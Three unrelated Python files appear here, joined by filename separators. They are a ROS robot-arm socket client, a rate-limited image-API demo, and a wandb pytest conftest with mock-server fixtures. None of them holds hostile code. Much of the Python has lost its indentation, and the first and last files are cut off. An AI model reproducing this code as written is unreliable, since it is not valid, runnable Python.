pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
        return  # end the generator; raising StopIteration here is an error under PEP 479 (Python 3.7+)
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
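# Illustrative usage sketch (not in the original file) of the switch helper
# above: iterate once to obtain match(), then test cases C-style; an empty
# case() acts as the default branch.
def _switch_example(value):
    for case in switch(value):
        if case(1):
            return 'one'
        if case(2, 3):
            return 'two or three'
        if case():  # default
            return 'other'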
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
#self.get_connect()
pass
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
        self.s.send(msg.encode('utf-8')) # encode with utf-8; other encodings exist, but utf-8 works for str
def get_recieve(self):
        data = self.s.recv(1024) # 1024 is the receive buffer size, limiting how much is read at once
        # return the raw bytes; Socket_feedback() inspects individual byte values below
        return data
def close(self):
self.s.close()
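# Illustrative sketch (not in the original file): typical lifecycle of the
# client class above - connect, send one command string, read the arm's raw
# reply bytes, then close the connection.
def _client_example(cmd):
    c = client()
    c.get_connect()  # connects to 192.168.0.1:8080 as defined above
    try:
        c.send(cmd)
        return c.get_recieve()
    finally:
        c.close()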
Socket = client()
def point_data(x, y, z, pitch, roll, yaw): ## receive pose data sent from the strategy side
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action, grip, ra, setvel, setboth): ## receive arm-mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## receive the arm speed-mode setting sent from the strategy side
socket_cmd.Speedmode = speedmode
def socket_talker(): ## create the server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##---------- socket packet transmission --------------##
##--------------- socket transmission of arm commands -----------------
def Socket_command():
global arm_mode_flag,data
# if arm_mode_flag == True:
# arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
        #------- set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
        #------- set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
        #------- set arm rapid & safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
    socket_cmd.action = 6 ## reset to the initial mode state
    print(data)
    print("Socket:", Socket)
    # send the command over the module-level client socket (client.send encodes the string as utf-8)
    Socket.send(data)
##-----------socket client--------
def socket_client():
    global Socket  # bind the module-level client so Socket_command() can reuse this connection
try:
Socket = client()
Socket.get_connect()
#Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
Socket_feedback(Socket)
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
Socket = s
while 1:
feedback_str = Socket.get_recieve()
        # the arm side reports the arm state
        if str(feedback_str[2]) == '48':# F: arm is Ready, prepared to receive the next motion command
            state_feedback.ArmState = 0
        if str(feedback_str[2]) == '49':# T: arm is busy and cannot execute the next motion command
            state_feedback.ArmState = 1
        if str(feedback_str[2]) == '54':# 6: the strategy has finished
            state_feedback.ArmState = 6
            print("shutdown")
        # check the sent flag
        if str(feedback_str[4]) == '48':# returns 0 (false)
            state_feedback.SentFlag = 0
        if str(feedback_str[4]) == '49':# returns 1 (true)
            state_feedback.SentFlag = 1
        ##--------------- socket transmission of arm commands: end -----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##------------- socket packet transmission: end --------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 6 ## reset to the initial mode state
    ## multithreading
t = threading.Thread(target=socket_client)
    t.start() # start the worker thread
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
    ## multithreading end
|
rate_limiting_robust.py
|
import json
import time
import multiprocessing.dummy as mp
from restb.sdk import *
from restb.sdk.api import service
# set allotted number of requests per second
# this is defined here as it could be retrieved through some external mechanism
__requests_per_second = 4
__waiting_threads = 10
# lambda helper for getting current time in millis
now_millis = lambda: int(round(time.time() * 1000))
def test_api(client_key):
# 1. create test image data and both processing and result queues
urls = ['https://demo.restb.ai/images/demo/demo-1.jpg',
'https://demo.restb.ai/images/demo/demo-2.jpg',
'https://demo.restb.ai/images/demo/demo-3.jpg',
'https://demo.restb.ai/images/demo/demo-4.jpg',
'https://demo.restb.ai/images/demo/demo-5.jpg',
'https://demo.restb.ai/images/demo/demo-6.jpg']
queue = mp.Queue()
image_id = 1
for url in urls:
for model in __MODELS:
queue.put(dict(id=image_id, url=url, model=model))
image_id += 1
results = mp.Queue()
# 2. Pick which API endpoint to use (US vs. EU)
url = __URL_US
# 3. Define concurrency specific objects
# stats objects
lock_stats = mp.Lock()
counter = mp.Value('i', 0)
avg_req_time = mp.Value('f', 0)
time_start = mp.Value('f', 999999999999999)
time_end = mp.Value('f', 0)
# concurrency control objects
lock_bucket = mp.Lock()
bucket = mp.Queue()
# pre-seed bucket
for i in range(__requests_per_second):
bucket.put('token')
# 4. Spawn processes/threads to process the images in the queue
# first start bucket refill thread
refill_thread = mp.Process(target=bucket_refill_thread, args=(lock_bucket, bucket))
refill_thread.start()
pool = []
for i in range(__requests_per_second * __waiting_threads): # waiting threads to keep the pipeline full
# pass in necessary parameters to thread, including client key, etc.
p = mp.Process(target=image_process_thread,
args=(url, client_key, queue, results,
lock_stats, counter, avg_req_time, time_start, time_end,
lock_bucket, bucket))
pool.append(p)
p.start()
# 5. clean-up after queue has been processed with "poison pill"
while not queue.empty():
# wait for queue to be processed
time.sleep(1)
for i in pool:
# seed shutdown messages / poison pills
queue.put(dict(id=-1, url='shutdown', model='shutdown'))
for p in pool:
# enforce clean shutdown of threads
p.join()
# stop bucket refill thread
bucket.put('shutdown')
refill_thread.join()
# 6. finally, return accumulated results
total = time_end.value - time_start.value
print('[{requests}] requests processed in [{seconds}] seconds with average time [{time}] ms, total throughput: [{throughput}] rps'.format(
requests=counter.value,
seconds=str(round(total / 1000.0, 1)),
time=str(round(avg_req_time.value / counter.value, 0)),
throughput=str(round(counter.value / (total / 1000.0), 2))
))
return results
def bucket_refill_thread(lock_bucket, bucket):
while True:
# (re-)establish parameters
interval = float(1.0)
tokens = __requests_per_second
# sleep for interval
        # the section below breaks intervals apart into smaller chunks in order to smooth out bursting
# for example, 8 rps can be broken down into: 2 requests / 250 ms
if __requests_per_second > 1:
            for i in range(__requests_per_second - 1, 1, -1):  # count down to find the largest divisor
if __requests_per_second % i == 0:
interval = 1 / float(i)
tokens = __requests_per_second / i
break
time.sleep(interval)
# check for poison pill
lock_bucket.acquire()
size = bucket.qsize()
shutdown = False
for i in range(size):
try:
token = bucket.get(block=False)
if 'shutdown' == token:
shutdown = True
break
else:
bucket.put(token)
except:
pass
if shutdown:
break
# don't let the bucket exceed token capacity
while bucket.qsize() < min(size + tokens, __requests_per_second):
bucket.put('token')
lock_bucket.release()
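# Worked example (illustrative, not part of the original script) of the
# interval splitting above: for 8 requests/second the largest divisor found
# counting down from 7 is 4, yielding 2 tokens every 0.25 s, which matches the
# "2 requests / 250 ms" comment.
def _split_interval(requests_per_second):
    interval, tokens = 1.0, requests_per_second
    if requests_per_second > 1:
        for i in range(requests_per_second - 1, 1, -1):
            if requests_per_second % i == 0:
                interval = 1 / float(i)
                tokens = requests_per_second / i
                break
    return interval, tokens
# _split_interval(8) -> (0.25, 2.0); _split_interval(4) -> (0.5, 2.0)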
def image_process_thread(url, client_key, queue, results,
lock_stats, counter, avg_req_time, time_start, time_end,
lock_bucket, bucket):
while True:
# acquire token in order to process
lock_bucket.acquire()
token = None
try:
token = bucket.get(block=False) # don't do anything with the token, just remove it, as it acts as our "access rights"
except:
pass
# first release lock
lock_bucket.release()
# then proceed or sleep
if not token:
time.sleep(1 / float(__requests_per_second))
continue
# get image URL entry to process
entry = None
try:
entry = queue.get(block=False)
except:
pass
if entry:
image_id = entry['id']
img_url = entry['url']
model_id = entry['model']
if img_url == 'shutdown':
print('thread shutting down')
break
params = __PARAMS.copy() # note the module variables as defined in restb/sdk/__init__.py
params['client_key'] = client_key
params['image_url'] = img_url
params['model_id'] = model_id
endpoint = __ENDPOINT
start_time = now_millis()
resp = service(url=url, endpoint=endpoint, params=params)
end_time = now_millis()
msg = '[{http}] thread [{thread}] {msg}'
vals = None
if resp is not None:
vals = json.loads(resp.text)
if vals and 'response' in vals:
results.put(dict(id=image_id, model=model_id, result=vals['response']))
total = end_time - start_time
print(msg.format(
http=resp.status_code,
thread=mp.current_process().name,
msg='processed request in [' + str(total) + '] ms')
)
# increment counter
lock_stats.acquire()
counter.value += 1
avg_req_time.value += total
if start_time < time_start.value:
time_start.value = start_time
if end_time > time_end.value:
time_end.value = end_time
lock_stats.release()
elif vals and (resp.status_code == 429 or ('error_id' in vals and vals['error_id'] == '005')): # handle legacy 005 errors for now
# handle over-rate limit retrying
print(msg.format(
http=resp.status_code,
thread=mp.current_process().name,
msg='surpassed rate limit, trying again')
)
# re-queue entry and try again
queue.put(entry)
else:
print('Request failed with response: {}'.format(resp))
def run(client_key):
output = test_api(client_key)
print('\n\nFinal results queue:')
results = {}
while not output.empty():
# accumulate differing solution results for an image ID together
result = output.get()
if result['id'] not in results:
results[result['id']] = {result['model']: result['result']}
else:
results[result['id']][result['model']] = result['result']
for i in range(len(results.keys())):
for k, v in sorted(results[i+1].items()):
print('[{id}] [{model}] {res}'.format(id=i+1, model=k, res=v))
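# Minimal usage sketch (illustrative): run the demo with your own restb.ai
# client key; the string below is a placeholder, not a real key.
if __name__ == '__main__':
    run('YOUR_CLIENT_KEY')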
|
conftest.py
|
import atexit
from contextlib import contextmanager
import datetime
import logging
import os
import platform
import shutil
import subprocess
import sys
import tempfile
import time
import threading
from unittest import mock
from unittest.mock import MagicMock
import click
from click.testing import CliRunner
import git
import nbformat
import psutil
import pytest
import requests
from six.moves import queue, urllib
import webbrowser
from tests import utils
import wandb
from wandb import wandb_sdk
from wandb.proto import wandb_internal_pb2 as pb
from wandb.sdk.interface.interface_queue import InterfaceQueue
from wandb.sdk.internal.handler import HandleManager
from wandb.sdk.internal.sender import SendManager
from wandb.sdk.lib.module import unset_globals
from wandb.sdk.lib.git import GitRepo
from wandb.util import mkdir_exists_ok
DUMMY_API_KEY = "1824812581259009ca9981580f8f8a9012409eee"
class ServerMap(object):
def __init__(self):
self._map = {}
def items(self):
return self._map.items()
def __getitem__(self, worker_id):
if self._map.get(worker_id) is None:
self._map[worker_id] = start_mock_server(worker_id)
return self._map[worker_id]
servers = ServerMap()
def test_cleanup(*args, **kwargs):
print("Shutting down mock servers")
for wid, server in servers.items():
print("Shutting down {}".format(wid))
server.terminate()
print("Open files during tests: ")
proc = psutil.Process()
print(proc.open_files())
def start_mock_server(worker_id):
"""We start a flask server process for each pytest-xdist worker_id"""
port = utils.free_port()
root = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
path = os.path.join(root, "tests", "utils", "mock_server.py")
command = [sys.executable, "-u", path]
env = os.environ
env["PORT"] = str(port)
env["PYTHONPATH"] = root
logfname = os.path.join(
root, "tests", "logs", "live_mock_server-{}.log".format(worker_id)
)
logfile = open(logfname, "w")
server = subprocess.Popen(
command,
stdout=logfile,
env=env,
stderr=subprocess.STDOUT,
bufsize=1,
close_fds=True,
)
server._port = port
server.base_url = f"http://localhost:{server._port}"
def get_ctx():
return requests.get(server.base_url + "/ctx").json()
def set_ctx(payload):
return requests.put(server.base_url + "/ctx", json=payload).json()
def reset_ctx():
return requests.delete(server.base_url + "/ctx").json()
server.get_ctx = get_ctx
server.set_ctx = set_ctx
server.reset_ctx = reset_ctx
started = False
for i in range(10):
try:
res = requests.get("%s/ctx" % server.base_url, timeout=5)
if res.status_code == 200:
started = True
break
print(f"Attempting to connect but got: {res}")
except requests.exceptions.RequestException:
print(
"Timed out waiting for server to start...", server.base_url, time.time()
)
if server.poll() is None:
time.sleep(1)
else:
raise ValueError("Server failed to start.")
if started:
print("Mock server listing on {} see {}".format(server._port, logfname))
else:
server.terminate()
print("Server failed to launch, see {}".format(logfname))
try:
print("=" * 40)
with open(logfname) as f:
for logline in f.readlines():
print(logline.strip())
print("=" * 40)
except Exception as e:
print("EXCEPTION:", e)
raise ValueError("Failed to start server! Exit code %s" % server.returncode)
return server
atexit.register(test_cleanup)
@pytest.fixture
def test_name(request):
# change "test[1]" to "test__1__"
name = urllib.parse.quote(request.node.name.replace("[", "__").replace("]", "__"))
return name
@pytest.fixture
def test_dir(test_name):
orig_dir = os.getcwd()
root = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
test_dir = os.path.join(root, "tests", "logs", test_name)
if os.path.exists(test_dir):
shutil.rmtree(test_dir)
mkdir_exists_ok(test_dir)
os.chdir(test_dir)
yield test_dir
os.chdir(orig_dir)
@pytest.fixture
def disable_git_save():
with mock.patch.dict("os.environ", WANDB_DISABLE_GIT="true"):
yield
@pytest.fixture
def git_repo(runner):
with runner.isolated_filesystem():
r = git.Repo.init(".")
mkdir_exists_ok("wandb")
# Because the forked process doesn't use my monkey patch above
with open("wandb/settings", "w") as f:
f.write("[default]\nproject: test")
open("README", "wb").close()
r.index.add(["README"])
r.index.commit("Initial commit")
yield GitRepo(lazy=False)
@pytest.fixture
def git_repo_with_remote(runner):
with runner.isolated_filesystem():
r = git.Repo.init(".")
r.create_remote("origin", "https://foo:bar@github.com/FooTest/Foo.git")
yield GitRepo(lazy=False)
@pytest.fixture
def git_repo_with_remote_and_port(runner):
with runner.isolated_filesystem():
r = git.Repo.init(".")
r.create_remote("origin", "https://foo:bar@github.com:8080/FooTest/Foo.git")
yield GitRepo(lazy=False)
@pytest.fixture
def git_repo_with_remote_and_empty_pass(runner):
with runner.isolated_filesystem():
r = git.Repo.init(".")
r.create_remote("origin", "https://foo:@github.com/FooTest/Foo.git")
yield GitRepo(lazy=False)
@pytest.fixture
def dummy_api_key():
return DUMMY_API_KEY
@pytest.fixture
def test_settings(test_dir, mocker, live_mock_server):
"""Settings object for tests"""
# TODO: likely not the right thing to do, we shouldn't be setting this
wandb._IS_INTERNAL_PROCESS = False
wandb.wandb_sdk.wandb_run.EXIT_TIMEOUT = 15
wandb.wandb_sdk.wandb_setup._WandbSetup.instance = None
wandb_dir = os.path.join(test_dir, "wandb")
mkdir_exists_ok(wandb_dir)
# root = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
settings = wandb.Settings(
_start_datetime=datetime.datetime.now(),
_start_time=time.time(),
api_key=DUMMY_API_KEY,
base_url=live_mock_server.base_url,
console="off",
host="test",
project="test",
root_dir=test_dir,
run_id=wandb.util.generate_id(),
save_code=False,
)
yield settings
# Just in case someone forgets to join in tests. ...well, please don't!
if wandb.run is not None:
wandb.run.finish()
@pytest.fixture
def mocked_run(runner, test_settings):
"""A managed run object for tests with a mock backend"""
run = wandb.wandb_sdk.wandb_run.Run(settings=test_settings)
run._set_backend(MagicMock())
yield run
@pytest.fixture
def runner(monkeypatch, mocker):
# monkeypatch.setattr('wandb.cli.api', InternalApi(
# default_settings={'project': 'test', 'git_tag': True}, load_settings=False))
monkeypatch.setattr(
wandb.util, "prompt_choices", lambda x, input_timeout=None, jupyter=False: x[0]
)
monkeypatch.setattr(
wandb.wandb_lib.apikey,
"prompt_choices",
lambda x, input_timeout=None, jupyter=False: x[0],
)
monkeypatch.setattr(click, "launch", lambda x: 1)
monkeypatch.setattr(webbrowser, "open_new_tab", lambda x: True)
mocker.patch("wandb.wandb_lib.apikey.isatty", lambda stream: True)
mocker.patch("wandb.wandb_lib.apikey.input", lambda x: 1)
mocker.patch("wandb.wandb_lib.apikey.getpass.getpass", lambda x: DUMMY_API_KEY)
return CliRunner()
@pytest.fixture(autouse=True)
def reset_setup():
wandb.wandb_sdk.wandb_setup._WandbSetup._instance = None
@pytest.fixture(autouse=True)
def local_netrc(monkeypatch):
"""Never use our real credentials, put them in their own isolated dir"""
with CliRunner().isolated_filesystem():
# TODO: this seems overkill...
origexpand = os.path.expanduser
# Touch that netrc
open(".netrc", "wb").close()
def expand(path):
if "netrc" in path:
try:
ret = os.path.realpath("netrc")
except OSError:
ret = origexpand(path)
else:
ret = origexpand(path)
return ret
monkeypatch.setattr(os.path, "expanduser", expand)
yield
@pytest.fixture(autouse=True)
def local_settings(mocker):
"""Place global settings in an isolated dir"""
with CliRunner().isolated_filesystem():
cfg_path = os.path.join(os.getcwd(), ".config", "wandb", "settings")
mkdir_exists_ok(os.path.join(".config", "wandb"))
mocker.patch("wandb.old.settings.Settings._global_path", return_value=cfg_path)
yield
@pytest.fixture
def mock_server(mocker):
return utils.mock_server(mocker)
# We create one live_mock_server per pytest-xdist worker
@pytest.fixture
def live_mock_server(request, worker_id):
global servers
server = servers[worker_id]
name = urllib.parse.quote(request.node.name)
# We set the username so the mock backend can namespace state
os.environ["WANDB_USERNAME"] = name
os.environ["WANDB_BASE_URL"] = server.base_url
os.environ["WANDB_ERROR_REPORTING"] = "false"
os.environ["WANDB_API_KEY"] = DUMMY_API_KEY
# clear mock server ctx
server.reset_ctx()
yield server
del os.environ["WANDB_USERNAME"]
del os.environ["WANDB_BASE_URL"]
del os.environ["WANDB_ERROR_REPORTING"]
del os.environ["WANDB_API_KEY"]
@pytest.fixture
def notebook(live_mock_server, test_dir):
"""This launches a live server, configures a notebook to use it, and enables
devs to execute arbitrary cells. See tests/test_notebooks.py
"""
@contextmanager
def notebook_loader(nb_path, kernel_name="wandb_python", save_code=True, **kwargs):
with open(utils.notebook_path("setup.ipynb")) as f:
setupnb = nbformat.read(f, as_version=4)
setupcell = setupnb["cells"][0]
# Ensure the notebooks talks to our mock server
new_source = setupcell["source"].replace(
"__WANDB_BASE_URL__", live_mock_server.base_url,
)
if save_code:
new_source = new_source.replace("__WANDB_NOTEBOOK_NAME__", nb_path)
else:
new_source = new_source.replace("__WANDB_NOTEBOOK_NAME__", "")
setupcell["source"] = new_source
nb_path = utils.notebook_path(nb_path)
shutil.copy(nb_path, os.path.join(os.getcwd(), os.path.basename(nb_path)))
with open(nb_path) as f:
nb = nbformat.read(f, as_version=4)
nb["cells"].insert(0, setupcell)
try:
client = utils.WandbNotebookClient(nb, kernel_name=kernel_name)
with client.setup_kernel(**kwargs):
# Run setup commands for mocks
client.execute_cells(-1, store_history=False)
yield client
finally:
with open(os.path.join(os.getcwd(), "notebook.log"), "w") as f:
f.write(client.all_output_text())
wandb.termlog("Find debug logs at: %s" % os.getcwd())
wandb.termlog(client.all_output_text())
notebook_loader.base_url = live_mock_server.base_url
return notebook_loader
@pytest.fixture
def mocked_module(monkeypatch):
"""This allows us to mock modules loaded via wandb.util.get_module"""
def mock_get_module(module):
orig_get_module = wandb.util.get_module
mocked_module = MagicMock()
def get_module(mod):
if mod == module:
return mocked_module
else:
return orig_get_module(mod)
monkeypatch.setattr(wandb.util, "get_module", get_module)
return mocked_module
return mock_get_module
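# Illustrative sketch (a real test would live in a test module, not in
# conftest.py): mocked_module patches wandb.util.get_module so a requested
# optional dependency resolves to a MagicMock; "tensorboard" is just an
# example module name.
def test_mocked_module_example(mocked_module):
    fake_module = mocked_module("tensorboard")
    assert wandb.util.get_module("tensorboard") is fake_module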
@pytest.fixture
def mocked_ipython(mocker):
mocker.patch("wandb.sdk.lib.ipython._get_python_type", lambda: "jupyter")
mocker.patch("wandb.sdk.wandb_settings._get_python_type", lambda: "jupyter")
html_mock = mocker.MagicMock()
mocker.patch("wandb.sdk.lib.ipython.display_html", html_mock)
ipython = MagicMock()
ipython.html = html_mock
def run_cell(cell):
print("Running cell: ", cell)
exec(cell)
ipython.run_cell = run_cell
# TODO: this is really unfortunate, for reasons not clear to me, monkeypatch doesn't work
orig_get_ipython = wandb.jupyter.get_ipython
orig_display = wandb.jupyter.display
wandb.jupyter.get_ipython = lambda: ipython
wandb.jupyter.display = lambda obj: html_mock(obj._repr_html_())
yield ipython
wandb.jupyter.get_ipython = orig_get_ipython
wandb.jupyter.display = orig_display
def default_wandb_args():
"""This allows us to parameterize the wandb_init_run fixture
The most general arg is "env", you can call:
@pytest.mark.wandb_args(env={"WANDB_API_KEY": "XXX"})
To set env vars and have them unset when the test completes.
"""
return {
"error": None,
"k8s": None,
"sagemaker": False,
"tensorboard": False,
"resume": False,
"env": {},
"wandb_init": {},
}
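# Illustrative sketch (a real test would live in a test module, not in
# conftest.py): parameterize the wandb_init_run fixture through the wandb_args
# marker described above; the env value follows the docstring's own example
# and the tag is made up.
@pytest.mark.wandb_args(env={"WANDB_API_KEY": "XXX"}, wandb_init={"tags": ["example"]})
def test_wandb_args_example(wandb_init_run):
    assert wandb_init_run is not None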
def mocks_from_args(mocker, args, mock_server):
if args["k8s"] is not None:
mock_server.ctx["k8s"] = args["k8s"]
args["env"].update(utils.mock_k8s(mocker))
if args["sagemaker"]:
args["env"].update(utils.mock_sagemaker(mocker))
@pytest.fixture
def wandb_init_run(request, runner, mocker, mock_server):
marker = request.node.get_closest_marker("wandb_args")
args = default_wandb_args()
if marker:
args.update(marker.kwargs)
try:
mocks_from_args(mocker, args, mock_server)
for k, v in args["env"].items():
os.environ[k] = v
# TODO: likely not the right thing to do, we shouldn't be setting this
wandb._IS_INTERNAL_PROCESS = False
# We want to run setup every time in tests
wandb.wandb_sdk.wandb_setup._WandbSetup._instance = None
mocker.patch("wandb.wandb_sdk.wandb_init.Backend", utils.BackendMock)
run = wandb.init(
settings=dict(console="off", mode="offline", _except_exit=False),
**args["wandb_init"],
)
yield run
wandb.finish()
finally:
unset_globals()
for k, v in args["env"].items():
del os.environ[k]
@pytest.fixture
def wandb_init(request, runner, mocker, mock_server):
def init(*args, **kwargs):
try:
mocks_from_args(mocker, default_wandb_args(), mock_server)
# TODO: likely not the right thing to do, we shouldn't be setting this
wandb._IS_INTERNAL_PROCESS = False
# We want to run setup every time in tests
wandb.wandb_sdk.wandb_setup._WandbSetup._instance = None
mocker.patch("wandb.wandb_sdk.wandb_init.Backend", utils.BackendMock)
return wandb.init(
settings=dict(console="off", mode="offline", _except_exit=False),
*args,
**kwargs,
)
finally:
unset_globals()
return init
@pytest.fixture()
def restore_version():
save_current_version = wandb.__version__
yield
wandb.__version__ = save_current_version
try:
del wandb.__hack_pypi_latest_version__
except AttributeError:
pass
@pytest.fixture()
def parse_ctx():
"""Fixture providing class to parse context data."""
def parse_ctx_fn(ctx, run_id=None):
return utils.ParseCTX(ctx, run_id=run_id)
yield parse_ctx_fn
@pytest.fixture()
def record_q():
return queue.Queue()
@pytest.fixture()
def fake_interface(record_q):
return InterfaceQueue(record_q=record_q)
@pytest.fixture
def fake_backend(fake_interface):
class FakeBackend:
def __init__(self):
self.interface = fake_interface
yield FakeBackend()
@pytest.fixture
def fake_run(fake_backend):
def run_fn():
s = wandb.Settings()
run = wandb_sdk.wandb_run.Run(settings=s)
run._set_backend(fake_backend)
return run
yield run_fn
@pytest.fixture
def records_util():
def records_fn(q):
ru = utils.RecordsUtil(q)
return ru
yield records_fn
@pytest.fixture
def user_test(fake_run, record_q, records_util):
class UserTest:
pass
ut = UserTest()
ut.get_run = fake_run
ut.get_records = lambda: records_util(record_q)
yield ut
# @pytest.hookimpl(tryfirst=True, hookwrapper=True)
# def pytest_runtest_makereport(item, call):
# outcome = yield
# rep = outcome.get_result()
# if rep.when == "call" and rep.failed:
# print("DEBUG PYTEST", rep, item, call, outcome)
@pytest.fixture
def log_debug(caplog):
caplog.set_level(logging.DEBUG)
yield
# for rec in caplog.records:
# print("LOGGER", rec.message, file=sys.stderr)
# ----------------------
# internal test fixtures
# ----------------------
@pytest.fixture()
def internal_result_q():
return queue.Queue()
@pytest.fixture()
def internal_sender_q():
return queue.Queue()
@pytest.fixture()
def internal_writer_q():
return queue.Queue()
@pytest.fixture()
def internal_process():
# FIXME: return mocked process (needs is_alive())
return MockProcess()
class MockProcess:
def __init__(self):
self._alive = True
def is_alive(self):
return self._alive
@pytest.fixture()
def _internal_sender(record_q, internal_result_q, internal_process):
return InterfaceQueue(
record_q=record_q, result_q=internal_result_q, process=internal_process,
)
@pytest.fixture()
def internal_sm(
runner,
internal_sender_q,
internal_result_q,
test_settings,
mock_server,
_internal_sender,
):
with runner.isolated_filesystem():
test_settings.update(
root_dir=os.getcwd(), source=wandb.sdk.wandb_settings.Source.INIT
)
sm = SendManager(
settings=test_settings,
record_q=internal_sender_q,
result_q=internal_result_q,
interface=_internal_sender,
)
yield sm
@pytest.fixture()
def stopped_event():
stopped = threading.Event()
yield stopped
@pytest.fixture()
def internal_hm(
runner,
record_q,
internal_result_q,
test_settings,
mock_server,
internal_sender_q,
internal_writer_q,
_internal_sender,
stopped_event,
):
with runner.isolated_filesystem():
test_settings.update(
root_dir=os.getcwd(), source=wandb.sdk.wandb_settings.Source.INIT
)
hm = HandleManager(
settings=test_settings,
record_q=record_q,
result_q=internal_result_q,
stopped=stopped_event,
sender_q=internal_sender_q,
writer_q=internal_writer_q,
interface=_internal_sender,
)
yield hm
@pytest.fixture()
def internal_get_record():
def _get_record(input_q, timeout=None):
try:
i = input_q.get(timeout=timeout)
except queue.Empty:
return None
return i
return _get_record
@pytest.fixture()
def start_send_thread(
internal_sender_q, internal_get_record, stopped_event, internal_process
):
def start_send(send_manager):
def target():
try:
while True:
payload = internal_get_record(
input_q=internal_sender_q, timeout=0.1
)
if payload:
send_manager.send(payload)
elif stopped_event.is_set():
break
except Exception as e:
stopped_event.set()
internal_process._alive = False
t = threading.Thread(target=target)
t.name = "testing-sender"
t.daemon = True
t.start()
return t
yield start_send
stopped_event.set()
@pytest.fixture()
def start_handle_thread(record_q, internal_get_record, stopped_event):
def start_handle(handle_manager):
def target():
while True:
payload = internal_get_record(input_q=record_q, timeout=0.1)
if payload:
handle_manager.handle(payload)
elif stopped_event.is_set():
break
t = threading.Thread(target=target)
t.name = "testing-handler"
t.daemon = True
t.start()
return t
yield start_handle
stopped_event.set()
@pytest.fixture()
def _start_backend(
mocked_run,
internal_hm,
internal_sm,
_internal_sender,
start_handle_thread,
start_send_thread,
log_debug,
):
def start_backend_func(initial_run=True, initial_start=False):
ht = start_handle_thread(internal_hm)
st = start_send_thread(internal_sm)
if initial_run:
run = _internal_sender.communicate_run(mocked_run)
if initial_start:
_internal_sender.communicate_run_start(run.run)
return (ht, st)
yield start_backend_func
@pytest.fixture()
def _stop_backend(
mocked_run,
internal_hm,
internal_sm,
_internal_sender,
start_handle_thread,
start_send_thread,
